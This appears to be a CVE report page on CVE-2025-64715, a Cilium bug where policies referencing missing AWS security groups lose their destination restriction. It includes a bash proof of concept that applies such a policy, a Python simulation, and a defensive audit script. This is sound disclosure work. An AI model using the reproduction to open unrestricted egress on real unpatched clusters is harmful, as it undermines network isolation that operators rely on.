Security Vulnerability Report

CVE-2025-64715

Published: 2025-11-29 01:16:01
Last Modified: 2025-12-04 20:38:45

Description

Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to versions 1.16.17, 1.17.10, and 1.18.4, a CiliumNetworkPolicy that uses egress.toGroups.aws.securityGroupsIds to reference AWS security group IDs that do not exist, or that are not attached to any network interface, may unintentionally allow broader outbound access than the policy author intended. The operator resolves a toGroups reference into a derived policy whose destinations are expressed as a toCIDRSet; when no addresses resolve, that toCIDRSet is not generated, so the derived egress rule carries no destination restriction and outbound traffic may be permitted to more destinations than originally intended. This issue has been patched in versions 1.16.17, 1.17.10, and 1.18.4. There are no workarounds for this issue; the only remediation is to upgrade.

CVSS Details

CVSS Score
4.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

The 4.0 score and vector above are the CNA (GitHub) assessment. NVD's own analysis (the Primary metric in the raw JSON below) rates the issue 5.5 MEDIUM with vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N. Both are local-vector, confidentiality-only scores: the bug widens where an already-running workload may send traffic; it does not grant new access into the cluster.

Configurations (Affected Products)

cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:* - VULNERABLE
  Cilium < 1.16.17
  Cilium 1.17.0 up to (excluding) 1.17.10
  Cilium 1.18.0 up to (excluding) 1.18.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-64715 PoC - Cilium AWS Security Group Policy Bypass
# Demonstrates how referencing a non-existent (or unattached) AWS security group
# in a CiliumNetworkPolicy toGroups rule yields a derived policy without toCIDRSet.
# Requires a cluster running an affected Cilium release (< 1.16.17, < 1.17.10, < 1.18.4)
# with the operator's AWS toGroups integration enabled.
set -euo pipefail

cat << 'EOF' > vulnerable-policy.yaml
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: egress-to-aws-sg
spec:
  endpointSelector:
    matchLabels:
      app: demo
  egress:
    - toGroups:
        - aws:
            securityGroupsIds:
              - "sg-00000000000000000"   # non-existent security group ID
      toPorts:
        - ports:
            - port: "443"
              protocol: TCP
EOF

# Apply the policy; the operator resolves toGroups into a derived CiliumNetworkPolicy.
kubectl apply -f vulnerable-policy.yaml

# The source policy is unchanged; the interesting object is the derived one.
kubectl get cnp egress-to-aws-sg -o yaml

# Inspect the derived policy the operator generated (its name is prefixed with the
# source policy name). On an affected release the derived egress rule has no
# toCIDRSet: with only the toPorts section left, it permits TCP/443 egress to any
# destination instead of only the addresses attached to the security group.
kubectl get cnp -o yaml | grep -A30 'name: egress-to-aws-sg-'

python
#!/usr/bin/env python3
"""
CVE-2025-64715 - Cilium AWS Security Group Policy Bypass PoC
Simulates how unresolved AWS security group references leave the derived
policy without a toCIDRSet. This is a model of the behaviour, not Cilium code.
"""


def simulate_cilium_policy_processing(security_group_ids, sg_exists_map):
    """Simulate the affected operator behaviour.

    Args:
        security_group_ids: AWS security group IDs listed in the policy rule
        sg_exists_map: dict mapping SG ID to whether it exists and is attached to an ENI

    Returns:
        The toCIDRSet entries that would be generated (possibly empty)
    """
    to_cidr_set = []
    for sg_id in security_group_ids:
        if sg_exists_map.get(sg_id, False):
            # SG exists and is attached: would resolve to the ENI addresses
            to_cidr_set.append(f"resolved_ip_for_{sg_id}")
        else:
            # The bug: an unresolved SG is skipped silently and the rule is still emitted
            print(f"[!] Security group {sg_id} not found, skipping...")
    return to_cidr_set


def fixed_policy_processing(security_group_ids, sg_exists_map):
    """Illustrative hardened behaviour: refuse to emit a rule when any referenced SG is missing."""
    to_cidr_set = []
    missing_sgs = []
    for sg_id in security_group_ids:
        if sg_exists_map.get(sg_id, False):
            to_cidr_set.append(f"resolved_ip_for_{sg_id}")
        else:
            missing_sgs.append(sg_id)
    if missing_sgs:
        print(f"[!] ERROR: Referenced security groups not found: {missing_sgs}")
        print("[!] Policy validation FAILED - will not apply")
        return None
    return to_cidr_set


if __name__ == "__main__":
    print("=== CVE-2025-64715 Policy Bypass Demonstration ===\n")

    # Vulnerable scenario: the rule references only a security group that does
    # not exist, so nothing resolves and no toCIDRSet is generated at all.
    policy_sgs = ["sg-nonexistent-id"]
    sg_status = {
        "sg-12345678": True,        # exists and is attached to an ENI
        "sg-nonexistent-id": False  # does NOT exist
    }
    print(f"Policy references security groups: {policy_sgs}")
    print(f"Security group status: {sg_status}\n")

    result = simulate_cilium_policy_processing(policy_sgs, sg_status)
    print(f"\nGenerated toCIDRSet: {result}")
    if not result:
        print("\n[!] VULNERABILITY: No toCIDRSet generated; the rule keeps only its toPorts section")
        print("[!] Result: egress is permitted to ANY destination on the selected ports")
        print("[!] Expected: the policy should fail validation or restrict to the resolved addresses")

    print("\n\n=== Expected Fixed Behavior (illustrative) ===")
    result_fixed = fixed_policy_processing(policy_sgs, sg_status)
    print(f"Result: {result_fixed}")
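The practical consequence of the advisory is that a derived egress rule which lost its toCIDRSet has no L3 selector left, so its remaining toPorts section matches any destination. The following script, an added example that is not Cilium's own code, models that derivation step on a constructed policy and then audits a derived CiliumNetworkPolicy for exactly that symptom. It assumes the derived spec keeps the source's egress rule order and links back to its parent via ownerReferences; the derived-policy name, the security-group-to-address map and the `strict` hardened variant are constructed for the example and are not claims about the upstream patch.

```python
#!/usr/bin/env python3
"""Model of the toGroups -> toCIDRSet derivation behind CVE-2025-64715, plus an
audit that flags derived egress rules left without any destination restriction.

Added example, not Cilium code. Cluster data is replaced by constructed inputs.
"""
import copy
import ipaddress

# L3 (destination) selector keys an egress rule may carry. A rule with none of
# these matches any destination, so its toPorts section alone decides what is allowed.
L3_KEYS = ("toEndpoints", "toEntities", "toCIDR", "toCIDRSet",
           "toFQDNs", "toServices", "toGroups", "toNodes")

# Constructed: ENI private addresses attached to each security group in the account.
# sg-00000000000000000 (referenced by the policy below) is deliberately absent.
SG_TO_IPS = {"sg-0aaaaaaaaaaaaaaaa": ["10.20.1.15", "10.20.1.16"]}

# Constructed source policy: rule 0 uses toGroups, rule 1 is a plain CIDR rule.
SOURCE_CNP = {
    "apiVersion": "cilium.io/v2",
    "kind": "CiliumNetworkPolicy",
    "metadata": {"name": "egress-to-aws-sg", "namespace": "default"},
    "spec": {
        "endpointSelector": {"matchLabels": {"app": "demo"}},
        "egress": [
            {
                "toGroups": [{"aws": {"securityGroupsIds": ["sg-00000000000000000"]}}],
                "toPorts": [{"ports": [{"port": "443", "protocol": "TCP"}]}],
            },
            {
                "toCIDRSet": [{"cidr": "10.0.0.0/8"}],
                "toPorts": [{"ports": [{"port": "53", "protocol": "UDP"}]}],
            },
        ],
    },
}


def derive_policy(source_cnp, sg_to_ips, strict=False):
    """Turn every toGroups reference into a toCIDRSet, as the operator does.

    strict=False reproduces the behaviour the advisory describes: a group that
    resolves to no addresses is dropped and the rule is emitted without toCIDRSet.
    strict=True is an illustrative hardened variant (an assumption, not a claim
    about the upstream patch): it refuses to emit such a rule at all.
    """
    derived = copy.deepcopy(source_cnp)
    parent = source_cnp["metadata"]["name"]
    # Derived-policy naming and ownerReferences are assumptions made for the example.
    derived["metadata"]["name"] = f"{parent}-togroups-derived"
    derived["metadata"]["ownerReferences"] = [{"kind": "CiliumNetworkPolicy", "name": parent}]
    for rule in derived["spec"].get("egress", []):
        groups = rule.pop("toGroups", None)
        if not groups:
            continue
        addrs = set()
        for group in groups:
            for sg in group.get("aws", {}).get("securityGroupsIds", []):
                addrs.update(ipaddress.ip_address(a) for a in sg_to_ips.get(sg, []))
        if addrs:
            # Each resolved address becomes a host CIDR (/32 for IPv4, /128 for IPv6).
            rule["toCIDRSet"] = [{"cidr": f"{a}/{a.max_prefixlen}"}
                                 for a in sorted(addrs, key=lambda a: (a.version, a))]
        elif strict:
            raise ValueError(f"toGroups {groups} resolved to no addresses; "
                             "refusing to emit an unrestricted rule")
        # non-strict: fall through and leave the rule with only its L4 section
    return derived


def audit_derived(source_cnp, derived_cnp):
    """Flag derived egress rules that carry no L3 selector.

    Returns one finding per affected rule: its index, the toGroups it came from
    (assumes the derived spec keeps the source's rule order) and the ports it opens.
    """
    findings = []
    src_rules = source_cnp["spec"].get("egress", [])
    for i, rule in enumerate(derived_cnp["spec"].get("egress", [])):
        if any(rule.get(k) for k in L3_KEYS):
            continue  # some destination restriction survived the derivation
        origin = src_rules[i].get("toGroups") if i < len(src_rules) else None
        ports = [f'{p["port"]}/{p.get("protocol", "ANY")}'
                 for tp in rule.get("toPorts", []) for p in tp.get("ports", [])]
        findings.append({
            "rule": i,
            "from_groups": origin,
            "ports": ports or ["*"],
            "issue": "no L3 selector left: egress permitted to any destination",
        })
    return findings


if __name__ == "__main__":
    vulnerable = derive_policy(SOURCE_CNP, SG_TO_IPS)
    for f in audit_derived(SOURCE_CNP, vulnerable):
        print(f"rule {f['rule']} from {f['from_groups']}: {f['issue']} on {f['ports']}")
    try:
        derive_policy(SOURCE_CNP, SG_TO_IPS, strict=True)
    except ValueError as exc:
        print(f"strict derivation: {exc}")
```

Against a live cluster the same audit applies to the derived policies the operator writes: dump them with kubectl, pair each with its parent, and treat any derived egress rule with no L3 selector as the unresolved-toGroups symptom rather than as an intentional allow-all.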

References

https://github.com/cilium/cilium/security/advisories/GHSA-38pp-6gcp-rqvm (Vendor Advisory, Patch)
https://github.com/cilium/cilium/commit/a385856b59c8289cc7273fa3a3062bbf0ef96c97 (Patch)
https://github.com/cilium/cilium/releases/tag/v1.16.17 (Release Notes)
https://github.com/cilium/cilium/releases/tag/v1.17.10 (Release Notes)
https://github.com/cilium/cilium/releases/tag/v1.18.4 (Release Notes)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-64715",
    "sourceIdentifier": "security-advisories@github.com",
    "published": "2025-11-29T01:16:01.427",
    "lastModified": "2025-12-04T20:38:45.300",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to versions 1.16.17, 1.17.10, and 1.18.4, CiliumNetworkPolicys which use egress.toGroups.aws.securityGroupsIds to reference AWS security group IDs that do not exist or are not attached to any network interface may unintentionally allow broader outbound access than intended by the policy authors. In such cases, the toCIDRset section of the derived policy is not generated, which means outbound traffic may be permitted to more destinations than originally intended. This issue has been patched in versions 1.16.17, 1.17.10, and 1.18.4. There are no workarounds for this issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "security-advisories@github.com",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.5,
          "impactScore": 1.4
        },
        {
          "source": "nvd@nist.gov",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "security-advisories@github.com",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-284"}]
      },
      {
        "source": "nvd@nist.gov",
        "type": "Primary",
        "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.16.17",
                "matchCriteriaId": "4A7D5E2F-7DF6-4EBE-8E0C-63C0C39D8D29"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "1.17.0",
                "versionEndExcluding": "1.17.10",
                "matchCriteriaId": "BD15500F-5958-45C4-BF78-9756FEB4CB2F"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:cilium:cilium:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "1.18.0",
                "versionEndExcluding": "1.18.4",
                "matchCriteriaId": "C2C4B9B4-3CB3-47A3-ACF9-195E77B2FE2B"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/cilium/cilium/commit/a385856b59c8289cc7273fa3a3062bbf0ef96c97", "source": "security-advisories@github.com", "tags": ["Patch"]},
      {"url": "https://github.com/cilium/cilium/releases/tag/v1.16.17", "source": "security-advisories@github.com", "tags": ["Release Notes"]},
      {"url": "https://github.com/cilium/cilium/releases/tag/v1.17.10", "source": "security-advisories@github.com", "tags": ["Release Notes"]},
      {"url": "https://github.com/cilium/cilium/releases/tag/v1.18.4", "source": "security-advisories@github.com", "tags": ["Release Notes"]},
      {"url": "https://github.com/cilium/cilium/security/advisories/GHSA-38pp-6gcp-rqvm", "source": "security-advisories@github.com", "tags": ["Patch", "Vendor Advisory"]}
    ]
  }
}